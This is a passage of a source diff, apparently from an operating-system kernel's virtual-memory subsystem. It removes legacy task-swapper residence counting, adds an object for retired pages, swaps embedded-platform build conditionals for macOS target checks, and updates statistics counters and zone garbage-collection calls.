        .memq_hint = VM_PAGE_NULL,
        .ref_count = 1,
-#if     TASK_SWAPPER
-       .res_count = 1,
-#endif  /* TASK_SWAPPER */
        .resident_page_count = 0,
        .wired_page_count = 0,
        .reusable_page_count = 0,
@@ -554,7 +560,7 @@ vm_object_bootstrap(void)
            ZC_NOENCRYPT | ZC_ALIGNMENT_REQUIRED,
            ZONE_ID_ANY, ^(zone_t z){
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #else
                (void)z;
 #endif
@@ -568,30 +574,28 @@ vm_object_bootstrap(void)
         *      Initialize the "kernel object"
         */
 
-       kernel_object = &kernel_object_store;
-
-/*
- *     Note that in the following size specifications, we need to add 1 because
- *     VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size.
- */
-
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           kernel_object);
-
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           compressor_object);
+       /*
+        * Note that in the following size specifications, we need to add 1 because
+        * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size.
+        */
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, kernel_object);
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, compressor_object);
        kernel_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
        compressor_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
        kernel_object->no_tag_update = TRUE;
 
+       /*
+        * The object to hold retired VM pages.
+        */
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, retired_pages_object);
+       retired_pages_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
+
        /*
         *      Initialize the "submap object".  Make it as large as the
         *      kernel object so that no limit is imposed on submap sizes.
         */
 
-       vm_submap_object = &vm_submap_object_store;
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           vm_submap_object);
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, vm_submap_object);
        vm_submap_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
 
        /*
@@ -666,7 +670,7 @@ vm_object_deallocate(
                return;
        }
 
-       if (object == kernel_object || object == compressor_object) {
+       if (object == kernel_object || object == compressor_object || object == retired_pages_object) {
                vm_object_lock_shared(object);
 
                OSAddAtomic(-1, &object->ref_count);
@@ -674,6 +678,8 @@ vm_object_deallocate(
                if (object->ref_count == 0) {
                        if (object == kernel_object) {
                                panic("vm_object_deallocate: losing kernel_object\n");
+                       } else if (object == retired_pages_object) {
+                               panic("vm_object_deallocate: losing retired_pages_object\n");
                        } else {
                                panic("vm_object_deallocate: losing compressor_object\n");
                        }
@@ -805,7 +811,6 @@ vm_object_deallocate(
                if ((object->ref_count > 1) || object->terminating) {
                        vm_object_lock_assert_exclusive(object);
                        object->ref_count--;
-                       vm_object_res_deallocate(object);
 
                        if (object->ref_count == 1 &&
                            object->shadow != VM_OBJECT_NULL) {
@@ -847,7 +852,6 @@ vm_object_deallocate(
                        continue;
                }
 
-               VM_OBJ_RES_DECR(object);        /* XXX ? */
                /*
                 *      Terminate this object. If it had a shadow,
                 *      then deallocate it; otherwise, if we need
@@ -928,7 +932,7 @@ vm_object_page_grab(
                        if ((p->vmp_q_state != VM_PAGE_ON_ACTIVE_Q) && p->vmp_reference == TRUE) {
                                vm_page_activate(p);
 
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                                vm_object_page_grab_reactivations++;
                        }
                        vm_page_unlock_queues();
@@ -1297,7 +1301,6 @@ vm_object_terminate(
                vm_object_lock_assert_exclusive(object);
                object->ref_count--;
                assert(object->ref_count > 0);
-               vm_object_res_deallocate(object);
                vm_object_unlock(object);
                return KERN_FAILURE;
        }
@@ -1443,14 +1446,10 @@ vm_object_reap(
        object->pager = MEMORY_OBJECT_NULL;
 
        if (pager != MEMORY_OBJECT_NULL) {
-               memory_object_control_disable(object->pager_control);
+               memory_object_control_disable(&object->pager_control);
        }
 
        object->ref_count--;
-#if     TASK_SWAPPER
-       assert(object->res_count == 0);
-#endif  /* TASK_SWAPPER */
-
        assert(object->ref_count == 0);
 
        /*
@@ -1646,7 +1645,7 @@ restart_after_sleep:
                pmap_flush_context_init(&pmap_flush_context_storage);
        }
 
-       vm_page_lockspin_queues();
+       vm_page_lock_queues();
 
        next = (vm_page_t)vm_page_queue_first(&object->memq);
 
@@ -1675,7 +1674,7 @@ restart_after_sleep:
 
                        loop_count = BATCH_LIMIT(V_O_R_MAX_BATCH);
 
-                       vm_page_lockspin_queues();
+                       vm_page_lock_queues();
                }
                if (reap_type == REAP_DATA_FLUSH || reap_type == REAP_TERMINATE) {
                        if (p->vmp_busy || p->vmp_cleaning) {
@@ -1974,7 +1973,7 @@ vm_object_destroy(
        old_pager = object->pager;
        object->pager = MEMORY_OBJECT_NULL;
        if (old_pager != MEMORY_OBJECT_NULL) {
-               memory_object_control_disable(object->pager_control);
+               memory_object_control_disable(&object->pager_control);
        }
 
        /*
@@ -3736,13 +3735,6 @@ Retry:
                assert(new_copy->ref_count > 0);
                new_copy->ref_count++;          /* for old_copy->shadow ref. */
 
-#if TASK_SWAPPER
-               if (old_copy->res_count) {
-                       VM_OBJ_RES_INCR(new_copy);
-                       VM_OBJ_RES_DECR(src_object);
-               }
-#endif
-
                vm_object_unlock(old_copy);     /* done with old_copy */
        }
 
@@ -3926,6 +3918,14 @@ vm_object_shadow(
 
        assert(source->copy_strategy != MEMORY_OBJECT_COPY_NONE); /* Purgeable objects shouldn't have shadow objects. */
 
+#if 00
+       /*
+        * The following optimization does not work in the context of submaps
+        * (the shared region, in particular).
+        * This object might have only 1 reference (in the submap) but that
+        * submap can itself be mapped multiple times, so the object is
+        * actually indirectly referenced more than once...
+        */
        if (vm_object_shadow_check &&
            source->vo_size == length &&
            source->ref_count == 1) {
@@ -3951,6 +3951,7 @@ vm_object_shadow(
                /* things changed while we were locking "source"... */
                vm_object_unlock(source);
        }
+#endif /* 00 */
 
        /*
         * *offset is the map entry's offset into the VM object and
@@ -4489,7 +4490,7 @@ vm_object_do_collapse(
                object->paging_offset =
                    backing_object->paging_offset + backing_offset;
                if (object->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-                       memory_object_control_collapse(object->pager_control,
+                       memory_object_control_collapse(&object->pager_control,
                            object);
                }
                /* the backing_object has lost its pager: reset all fields */
@@ -4581,26 +4582,7 @@ vm_object_do_bypass(
        vm_object_lock_assert_exclusive(object);
        vm_object_lock_assert_exclusive(backing_object);
 
-#if     TASK_SWAPPER
-       /*
-        *      Do object reference in-line to
-        *      conditionally increment shadow's
-        *      residence count.  If object is not
-        *      resident, leave residence count
-        *      on shadow alone.
-        */
-       if (backing_object->shadow != VM_OBJECT_NULL) {
-               vm_object_lock(backing_object->shadow);
-               vm_object_lock_assert_exclusive(backing_object->shadow);
-               backing_object->shadow->ref_count++;
-               if (object->res_count != 0) {
-                       vm_object_res_reference(backing_object->shadow);
-               }
-               vm_object_unlock(backing_object->shadow);
-       }
-#else   /* TASK_SWAPPER */
        vm_object_reference(backing_object->shadow);
-#endif  /* TASK_SWAPPER */
 
        assert(!object->phys_contiguous);
        assert(!backing_object->phys_contiguous);
@@ -4654,12 +4636,6 @@ vm_object_do_bypass(
            (!backing_object->named && backing_object->ref_count > 1)) {
                vm_object_lock_assert_exclusive(backing_object);
                backing_object->ref_count--;
-#if     TASK_SWAPPER
-               if (object->res_count != 0) {
-                       vm_object_res_deallocate(backing_object);
-               }
-               assert(backing_object->ref_count > 0);
-#endif  /* TASK_SWAPPER */
                vm_object_unlock(backing_object);
        } else {
                /*
@@ -4667,12 +4643,6 @@ vm_object_do_bypass(
                 *      the backing object.
                 */
 
-#if     TASK_SWAPPER
-               if (object->res_count == 0) {
-                       /* XXX get a reference for the deallocate below */
-                       vm_object_res_reference(backing_object);
-               }
-#endif  /* TASK_SWAPPER */
                /*
                 * vm_object_collapse (the caller of this function) is
                 * now called from contexts that may not guarantee that a
@@ -5373,9 +5343,7 @@ vm_object_populate_with_private(
                                        VM_PAGE_SET_PHYS_PAGE(m, base_page);
                                }
                        } else {
-                               while ((m = vm_page_grab_fictitious()) == VM_PAGE_NULL) {
-                                       vm_page_more_fictitious();
-                               }
+                               m = vm_page_grab_fictitious(TRUE);
 
                                /*
                                 * private normally requires lock_queues but since we
@@ -5496,7 +5464,6 @@ restart:
        object->named = TRUE;
        vm_object_lock_assert_exclusive(object);
        object->ref_count++;
-       vm_object_res_reference(object);
        while (!object->pager_ready) {
                vm_object_sleep(object,
                    VM_OBJECT_EVENT_PAGER_READY,
@@ -5579,7 +5546,6 @@ vm_object_release_name(
                        vm_object_deallocate(object);
                        return KERN_SUCCESS;
                }
-               VM_OBJ_RES_DECR(object);
                shadow = object->pageout?VM_OBJECT_NULL:object->shadow;
 
                if (object->ref_count == 1) {
@@ -6287,93 +6253,6 @@ out:
 }
 
 
-#if     TASK_SWAPPER
-/*
- * vm_object_res_deallocate
- *
- * (recursively) decrement residence counts on vm objects and their shadows.
- * Called from vm_object_deallocate and when swapping out an object.
- *
- * The object is locked, and remains locked throughout the function,
- * even as we iterate down the shadow chain.  Locks on intermediate objects
- * will be dropped, but not the original object.
- *
- * NOTE: this function used to use recursion, rather than iteration.
- */
-
-__private_extern__ void
-vm_object_res_deallocate(
-       vm_object_t     object)
-{
-       vm_object_t orig_object = object;
-       /*
-        * Object is locked so it can be called directly
-        * from vm_object_deallocate.  Original object is never
-        * unlocked.
-        */
-       assert(object->res_count > 0);
-       while (--object->res_count == 0) {
-               assert(object->ref_count >= object->res_count);
-               vm_object_deactivate_all_pages(object);
-               /* iterate on shadow, if present */
-               if (object->shadow != VM_OBJECT_NULL) {
-                       vm_object_t tmp_object = object->shadow;
-                       vm_object_lock(tmp_object);
-                       if (object != orig_object) {
-                               vm_object_unlock(object);
-                       }
-                       object = tmp_object;
-                       assert(object->res_count > 0);
-               } else {
-                       break;
-               }
-       }
-       if (object != orig_object) {
-               vm_object_unlock(object);
-       }
-}
-
-/*
- * vm_object_res_reference
- *
- * Internal function to increment residence count on a vm object
- * and its shadows.  It is called only from vm_object_reference, and
- * when swapping in a vm object, via vm_map_swap.
- *
- * The object is locked, and remains locked throughout the function,
- * even as we iterate down the shadow chain.  Locks on intermediate objects
- * will be dropped, but not the original object.
- *
- * NOTE: this function used to use recursion, rather than iteration.
- */
-
-__private_extern__ void
-vm_object_res_reference(
-       vm_object_t     object)
-{
-       vm_object_t orig_object = object;
-       /*
-        * Object is locked, so this can be called directly
-        * from vm_object_reference.  This lock is never released.
-        */
-       while ((++object->res_count == 1) &&
-           (object->shadow != VM_OBJECT_NULL)) {
-               vm_object_t tmp_object = object->shadow;
-
-               assert(object->ref_count >= object->res_count);
-               vm_object_lock(tmp_object);
-               if (object != orig_object) {
-                       vm_object_unlock(object);
-               }
-               object = tmp_object;
-       }
-       if (object != orig_object) {
-               vm_object_unlock(object);
-       }
-       assert(orig_object->ref_count >= orig_object->res_count);
-}
-#endif  /* TASK_SWAPPER */
-
 /*
  *     vm_object_reference:
  *
@@ -6576,9 +6455,6 @@ MACRO_END
        /* "ref_count" refers to the object not its contents */
        assert(object1->ref_count >= 1);
        assert(object2->ref_count >= 1);
-#if TASK_SWAPPER
-       /* "res_count" refers to the object not its contents */
-#endif
        /* "resident_page_count" was updated above when transposing pages */
        /* "wired_page_count" was updated above when transposing pages */
 #if !VM_TAG_ACTIVE_UPDATE
@@ -6597,11 +6473,11 @@ MACRO_END
        __TRANSPOSE_FIELD(pager_control);
        /* update the memory_objects' pointers back to the VM objects */
        if (object1->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-               memory_object_control_collapse(object1->pager_control,
+               memory_object_control_collapse(&object1->pager_control,
                    object1);
        }
        if (object2->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-               memory_object_control_collapse(object2->pager_control,
+               memory_object_control_collapse(&object2->pager_control,
                    object2);
        }
        __TRANSPOSE_FIELD(copy_strategy);
@@ -6754,11 +6630,11 @@ extern int speculative_reads_disabled;
  * that could give us non-page-size aligned values if we start out with values that
  * are odd multiples of PAGE_SIZE.
  */
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 unsigned int preheat_max_bytes = (1024 * 512);
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 unsigned int preheat_max_bytes = MAX_UPL_TRANSFER_BYTES;
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 unsigned int preheat_min_bytes = (1024 * 32);
 
 
@@ -6821,7 +6697,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start,
        min_ph_size = round_page(preheat_min_bytes);
        max_ph_size = round_page(preheat_max_bytes);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (isSSD) {
                min_ph_size /= 2;
                max_ph_size /= 8;
@@ -6834,7 +6710,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start,
                        max_ph_size = trunc_page(max_ph_size);
                }
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        if (min_ph_size < PAGE_SIZE) {
                min_ph_size = PAGE_SIZE;
@@ -8779,9 +8655,7 @@ again:
                vm_object_unlock(object);
        }
 
-       if (__improbable(task->task_volatile_objects != 0 ||
-           task->task_nonvolatile_objects != 0 ||
-           task->task_owned_objects != 0)) {
+       if (__improbable(task->task_owned_objects != 0)) {
                panic("%s(%p): volatile=%d nonvolatile=%d owned=%d q=%p q_first=%p q_last=%p",
                    __FUNCTION__,
                    task,
index 6399f95d093b23100547bd823fa90a05443ceac0..f05742914e9cc503e60a721d54963ec62f9fef4d 100644 (file)
@@ -69,7 +69,6 @@
 #include <debug.h>
 #include <mach_assert.h>
 #include <mach_pagemap.h>
-#include <task_swapper.h>
 
 #include <mach/kern_return.h>
 #include <mach/boolean.h>
@@ -429,6 +428,9 @@ vm_object_t     kernel_object;          /* the single kernel object */
 extern
 vm_object_t     compressor_object;      /* the single compressor object */
 
+extern
+vm_object_t     retired_pages_object;   /* holds VM pages which should never be used */
+
 extern
 unsigned int    vm_object_absent_max;   /* maximum number of absent pages
                                          *  at a time for each object */
@@ -604,24 +606,6 @@ __private_extern__ vm_object_t  vm_object_allocate(vm_object_size_t size);
 __private_extern__ void    _vm_object_allocate(vm_object_size_t size,
     vm_object_t object);
 
-#if     TASK_SWAPPER
-
-__private_extern__ void vm_object_res_reference(
-       vm_object_t             object);
-__private_extern__ void vm_object_res_deallocate(
-       vm_object_t             object);
-#define VM_OBJ_RES_INCR(object) (object)->res_count++
-#define VM_OBJ_RES_DECR(object) (object)->res_count--
-
-#else   /* TASK_SWAPPER */
-
-#define VM_OBJ_RES_INCR(object)
-#define VM_OBJ_RES_DECR(object)
-#define vm_object_res_reference(object)
-#define vm_object_res_deallocate(object)
-
-#endif  /* TASK_SWAPPER */
-
 #define vm_object_reference_locked(object)              \
        MACRO_BEGIN                                     \
        vm_object_t RLObject = (object);                \
@@ -629,19 +613,16 @@ __private_extern__ void vm_object_res_deallocate(
        assert((RLObject)->ref_count > 0);              \
        (RLObject)->ref_count++;                        \
        assert((RLObject)->ref_count > 1);              \
-       vm_object_res_reference(RLObject);              \
        MACRO_END
 
 
-#define vm_object_reference_shared(object)                              \
-       MACRO_BEGIN                                                     \
-       vm_object_t RLObject = (object);                                \
-       vm_object_lock_assert_shared(object);                           \
-       assert((RLObject)->ref_count > 0);                              \
+#define vm_object_reference_shared(object)              \
+       MACRO_BEGIN                                     \
+       vm_object_t RLObject = (object);                \
+       vm_object_lock_assert_shared(object);           \
+       assert((RLObject)->ref_count > 0);              \
        OSAddAtomic(1, &(RLObject)->ref_count);         \
-       assert((RLObject)->ref_count > 0);                              \
-       /* XXX we would need an atomic version of the following ... */  \
-       vm_object_res_reference(RLObject);                              \
+       assert((RLObject)->ref_count > 0);              \
        MACRO_END
 
 
index 164a3614512cc52b4f66f8f61efca9262c143173..d4542fd10c1fcc88597ef77b14ca37633418a64e 100644 (file)
@@ -1423,6 +1423,9 @@ extern void             vm_page_create(
        ppnum_t         start,
        ppnum_t         end);
 
+extern void             vm_page_create_retired(
+       ppnum_t         pn);
+
 extern vm_page_t        kdp_vm_page_lookup(
        vm_object_t             object,
        vm_object_offset_t      offset);
@@ -1431,18 +1434,16 @@ extern vm_page_t        vm_page_lookup(
        vm_object_t             object,
        vm_object_offset_t      offset);
 
-extern vm_page_t        vm_page_grab_fictitious(void);
+extern vm_page_t        vm_page_grab_fictitious(boolean_t canwait);
 
-extern vm_page_t        vm_page_grab_guard(void);
+extern vm_page_t        vm_page_grab_guard(boolean_t canwait);
 
 extern void             vm_page_release_fictitious(
        vm_page_t page);
 
 extern void             vm_free_delayed_pages(void);
 
-extern void             vm_page_more_fictitious(void);
-
-extern int              vm_pool_low(void);
+extern bool             vm_pool_low(void);
 
 extern vm_page_t        vm_page_grab(void);
 extern vm_page_t        vm_page_grab_options(int flags);
@@ -1466,10 +1467,6 @@ extern vm_page_t        vm_page_alloc(
        vm_object_t             object,
        vm_object_offset_t      offset);
 
-extern vm_page_t        vm_page_alloc_guard(
-       vm_object_t             object,
-       vm_object_offset_t      offset);
-
 extern void             vm_page_init(
        vm_page_t       page,
        ppnum_t         phys_page,
@@ -1630,15 +1627,15 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
 
 #else /* CONFIG_JETSAM */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #define VM_CHECK_MEMORYSTATUS do {} while(0)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define VM_CHECK_MEMORYSTATUS   vm_pressure_response()
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #endif /* CONFIG_JETSAM */
 
@@ -1647,7 +1644,7 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
  * protected by the object lock.
  */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define SET_PAGE_DIRTY(m, set_pmap_modified)                            \
                MACRO_BEGIN                                             \
                vm_page_t __page__ = (m);                               \
@@ -1659,13 +1656,13 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
                }                                                       \
                __page__->vmp_dirty = TRUE;                             \
                MACRO_END
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 #define SET_PAGE_DIRTY(m, set_pmap_modified)                            \
                MACRO_BEGIN                                             \
                vm_page_t __page__ = (m);                               \
                __page__->vmp_dirty = TRUE;                             \
                MACRO_END
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define PAGE_ASSERT_WAIT(m, interruptible)                      \
                (((m)->vmp_wanted = TRUE),                      \
@@ -1702,12 +1699,6 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
                vm_page_free_unlocked(p, TRUE); \
                MACRO_END
 
-#define VM_PAGE_GRAB_FICTITIOUS(M)                                      \
-               MACRO_BEGIN                                             \
-               while ((M = vm_page_grab_fictitious()) == VM_PAGE_NULL) \
-                       vm_page_more_fictitious();                      \
-               MACRO_END
-
 #define VM_PAGE_WAIT()          ((void)vm_page_wait(THREAD_UNINT))
 
 #define vm_page_queue_lock (vm_page_locks.vm_page_queue_lock2)
@@ -1860,5 +1851,7 @@ extern void start_secluded_suppression(task_t);
 extern void stop_secluded_suppression(task_t);
 #endif /* CONFIG_SECLUDED_MEMORY */
 
+extern void vm_retire_boot_pages(void);
+extern uint32_t vm_retired_pages_count(void);
 
 #endif  /* _VM_VM_PAGE_H_ */
index 63dd004ea1de41ae93fe6a1c0a68d764cf75cee8..416921ce30aa9f004041ac373ef5cdfceaca7f43 100644 (file)
@@ -82,7 +82,7 @@
 #include <mach/sdt.h>
 
 #include <kern/kern_types.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/host_statistics.h>
 #include <kern/machine.h>
 #include <kern/misc_protos.h>
@@ -151,11 +151,11 @@ thread_t  vm_pageout_scan_thread = THREAD_NULL;
 boolean_t vps_dynamic_priority_enabled = FALSE;
 
 #ifndef VM_PAGEOUT_BURST_INACTIVE_THROTTLE  /* maximum iterations of the inactive queue w/o stealing/cleaning a page */
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 1024
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 4096
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif
 
 #ifndef VM_PAGEOUT_DEADLOCK_RELIEF
@@ -214,11 +214,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
  */
 
 #ifndef VM_PAGE_FREE_TARGET
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_TARGET(free)       (15 + (free) / 100)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_TARGET(free)       (15 + (free) / 80)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_FREE_TARGET */
 
 
@@ -228,22 +228,22 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
  */
 
 #ifndef VM_PAGE_FREE_MIN
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_MIN(free)          (10 + (free) / 200)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_MIN(free)          (10 + (free) / 100)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_FREE_MIN */
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_RESERVED_LIMIT     100
 #define VM_PAGE_FREE_MIN_LIMIT          1500
 #define VM_PAGE_FREE_TARGET_LIMIT       2000
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_RESERVED_LIMIT     1700
 #define VM_PAGE_FREE_MIN_LIMIT          3500
 #define VM_PAGE_FREE_TARGET_LIMIT       4000
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 /*
  *     When vm_page_free_count falls below vm_page_free_reserved,
@@ -269,11 +269,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
 #define VM_PAGE_REACTIVATE_LIMIT_MAX 20000
 
 #ifndef VM_PAGE_REACTIVATE_LIMIT
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_REACTIVATE_LIMIT(avail) (VM_PAGE_INACTIVE_TARGET(avail) / 2)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_REACTIVATE_LIMIT(avail) (MAX((avail) * 1 / 20,VM_PAGE_REACTIVATE_LIMIT_MAX))
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_REACTIVATE_LIMIT */
 #define VM_PAGEOUT_INACTIVE_FORCE_RECLAIM       1000
 
@@ -315,9 +315,9 @@ boolean_t vm_pageout_running = FALSE;
 uint32_t vm_page_upl_tainted = 0;
 uint32_t vm_page_iopl_tainted = 0;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static boolean_t vm_pageout_waiter  = FALSE;
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 #if DEVELOPMENT || DEBUG
@@ -446,7 +446,7 @@ vm_pageout_object_terminate(
 
                        if (m->vmp_dirty) {
                                vm_page_unwire(m, TRUE);        /* reactivates */
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                                PAGE_WAKEUP_DONE(m);
                        } else {
                                vm_page_free(m);  /* clears busy, etc. */
@@ -1587,7 +1587,7 @@ update_vm_info(void)
        vm_pageout_stats[vm_pageout_stat_now].phantom_ghosts_added = (unsigned int)(tmp - last.vm_phantom_cache_added_ghost);
        last.vm_phantom_cache_added_ghost = tmp;
 
-       tmp64 = get_pages_grabbed_count();
+       tmp64 = counter_load(&vm_page_grab_count);
        vm_pageout_stats[vm_pageout_stat_now].pages_grabbed = (unsigned int)(tmp64 - last_vm_page_pages_grabbed);
        last_vm_page_pages_grabbed = tmp64;
 
@@ -2299,8 +2299,6 @@ vps_flow_control(struct flow_control *flow_control, int *anons_grabbed, vm_objec
        iq->pgo_throttled = TRUE;
        assert_wait_timeout((event_t) &iq->pgo_laundry, THREAD_INTERRUPTIBLE, msecs, 1000 * NSEC_PER_USEC);
 
-       counter(c_vm_pageout_scan_block++);
-
        vm_page_unlock_queues();
 
        assert(vm_pageout_scan_wants_object == VM_OBJECT_NULL);
@@ -2478,7 +2476,7 @@ want_anonymous:
                                                vm_pageout_vminfo.vm_pageout_filecache_min_reactivated++;
 
                                                vm_page_activate(m);
-                                               VM_STAT_INCR(reactivations);
+                                               counter_inc(&vm_statistics_reactivations);
 #if CONFIG_BACKGROUND_QUEUE
 #if DEVELOPMENT || DEBUG
                                                if (*is_page_from_bg_q == TRUE) {
@@ -2748,7 +2746,7 @@ vps_deal_with_throttled_queues(vm_page_t m, vm_object_t *object, uint32_t *vm_pa
 #endif /* CONFIG_MEMORYSTATUS && CONFIG_JETSAM */
        } else {
                vm_page_activate(m);
-               VM_STAT_INCR(reactivations);
+               counter_inc(&vm_statistics_reactivations);
 
 #if CONFIG_BACKGROUND_QUEUE
 #if DEVELOPMENT || DEBUG
@@ -3418,7 +3416,7 @@ reactivate_page:
                                         * The page was/is being used, so put back on active list.
                                         */
                                        vm_page_activate(m);
-                                       VM_STAT_INCR(reactivations);
+                                       counter_inc(&vm_statistics_reactivations);
                                        inactive_burst_count = 0;
                                }
 #if CONFIG_BACKGROUND_QUEUE
@@ -3727,22 +3725,21 @@ vm_pageout_continue(void)
        assert_wait((event_t) &vm_page_free_wanted, THREAD_UNINT);
 
        vm_pageout_running = FALSE;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (vm_pageout_waiter) {
                vm_pageout_waiter = FALSE;
                thread_wakeup((event_t)&vm_pageout_waiter);
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        lck_mtx_unlock(&vm_page_queue_free_lock);
        vm_page_unlock_queues();
 
-       counter(c_vm_pageout_block++);
        thread_block((thread_continue_t)vm_pageout_continue);
        /*NOTREACHED*/
 }
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 kern_return_t
 vm_pageout_wait(uint64_t deadline)
 {
@@ -3761,7 +3758,7 @@ vm_pageout_wait(uint64_t deadline)
 
        return kr;
 }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 static void
@@ -4232,7 +4229,7 @@ vm_pageout_compress_page(void **current_chead, char *scratch_buf, vm_page_t m)
                        vm_object_owner_compressed_update(object,
                            +1);
                }
-               VM_STAT_INCR(compressions);
+               counter_inc(&vm_statistics_compressions);
 
                if (m->vmp_tabled) {
                        vm_page_remove(m, TRUE);
@@ -4380,16 +4377,16 @@ vm_pressure_response(void)
                return;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
        available_memory = (uint64_t) memorystatus_available_pages;
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
        available_memory = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY;
        memorystatus_available_pages = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY;
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
        total_pages = (unsigned int) atop_64(max_mem);
 #if CONFIG_SECLUDED_MEMORY
@@ -4582,7 +4579,7 @@ void
 vm_pageout_garbage_collect(int collect)
 {
        if (collect) {
-               if (is_zone_map_nearing_exhaustion()) {
+               if (zone_map_nearing_exhaustion()) {
                        /*
                         * Woken up by the zone allocator for zone-map-exhaustion jetsams.
                         *
@@ -4600,7 +4597,7 @@ vm_pageout_garbage_collect(int collect)
                         * ok; if memory pressure persists, the thread will simply be woken
                         * up again.
                         */
-                       consider_zone_gc(TRUE);
+                       zone_gc(ZONE_GC_JETSAM);
                } else {
                        /* Woken up by vm_pageout_scan or compute_pageout_gc_throttle. */
                        boolean_t buf_large_zfree = FALSE;
@@ -4617,10 +4614,10 @@ vm_pageout_garbage_collect(int collect)
                                }
                                if (first_try == TRUE || buf_large_zfree == TRUE) {
                                        /*
-                                        * consider_zone_gc should be last, because the other operations
+                                        * zone_gc should be last, because the other operations
                                         * might return memory to zones.
                                         */
-                                       consider_zone_gc(FALSE);
+                                       zone_gc(ZONE_GC_TRIM);
                                }
                                first_try = FALSE;
                        } while (buf_large_zfree == TRUE && vm_page_free_count < vm_page_free_target);
@@ -4872,13 +4869,22 @@ vm_pageout(void)
        thread_set_thread_name(vm_pageout_state.vm_pageout_external_iothread, "VM_pageout_external_iothread");
        thread_deallocate(vm_pageout_state.vm_pageout_external_iothread);
 
-       result = kernel_thread_start_priority((thread_continue_t)vm_pageout_garbage_collect, NULL,
+       result = kernel_thread_create((thread_continue_t)vm_pageout_garbage_collect, NULL,
            BASEPRI_DEFAULT,
            &thread);
        if (result != KERN_SUCCESS) {
                panic("vm_pageout_garbage_collect: create failed");
        }
        thread_set_thread_name(thread, "VM_pageout_garbage_collect");
